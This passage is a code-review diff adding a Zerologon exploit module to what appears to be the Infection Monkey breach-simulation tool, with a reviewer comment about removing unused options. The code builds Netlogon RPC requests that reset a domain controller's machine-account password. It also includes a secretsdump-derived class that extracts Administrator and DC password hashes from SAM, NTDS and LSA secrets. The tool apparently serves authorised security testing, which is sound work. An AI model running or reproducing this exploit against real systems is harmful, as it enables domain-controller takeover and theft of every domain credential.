monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+
+                request = NetrServerPasswordSet()
+                request['PrimaryName'] = NULL
+                request['AccountName'] = self.dc_name + '$\x00'
+                request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+                request['ComputerName'] = self.dc_name + '\x00'
+                request["Authenticator"] = authenticator
+                pwd_data = impacket.crypto.SamEncryptNTLMHash(unhexlify(original_pwd_nthash), session_key)
+                request["UasNewPassword"] = pwd_data
+                rpc_con.request(request)
+
+            except Exception as e:
+                LOG.info(f"Unexpected error: {e}")
+
+            return rpc_con
+
+        except nrpc.DCERPCSessionError as e:
+            # Failure should be due to a STATUS_ACCESS_DENIED error; otherwise, the attack is probably not working.
+            if e.get_error_code() == 0xc0000022:
+                return None
+            else:
+                LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+
+        except BaseException as e:
+            LOG.info(f"Unexpected error: {e}")
+
+
+class NetrServerPasswordSet(nrpc.NDRCALL):
+    opnum = 6
+    structure = (
+        ('PrimaryName', nrpc.PLOGONSRV_HANDLE),
+        ('AccountName', nrpc.WSTR),
+        ('SecureChannelType', nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
+        ('ComputerName', nrpc.WSTR),
+        ('Authenticator', nrpc.NETLOGON_AUTHENTICATOR),
+        ('UasNewPassword', nrpc.ENCRYPTED_NT_OWF_PASSWORD),
+    )
+
+
+class NetrServerPasswordSetResponse(nrpc.NDRCALL):
+    structure = (
+        ('ReturnAuthenticator', nrpc.NETLOGON_AUTHENTICATOR),
+        ('ErrorCode', nrpc.NTSTATUS),
+    )
+
+
+# Adapted from https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
+# Used to get Administrator and original DC passwords' hashes
+class DumpSecrets:
+    def __init__(self, remote_name, username='', password='', domain='', options=None):
+        self.__use_VSS_method = options['use_vss']
+        self.__remote_name = remote_name
+        self.__remote_host = options['target_ip']
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__lmhash = ''
+        self.__nthash = ''
+        self.__aes_key = options['aes_key']
+        self.__smb_connection = None
+        self.__remote_ops = None
+        self.__SAM_hashes = None
+        self.__NTDS_hashes = None
+        self.__LSA_secrets = None
+        self.__system_hive = options['system']
+        self.__bootkey = options['bootkey']
+        self.__security_hive = options['security']
+        self.__sam_hive = options['sam']
+        self.__ntds_file = options['ntds']
+        self.__history = options['history']
+        self.__no_lmhash = options['no_lmhash']
+        self.__is_remote = options['is_remote']
+        self.__output_file_name = options['outputfile']
```

Comment:
Some of these options are of no use. We could simplify the code by removing them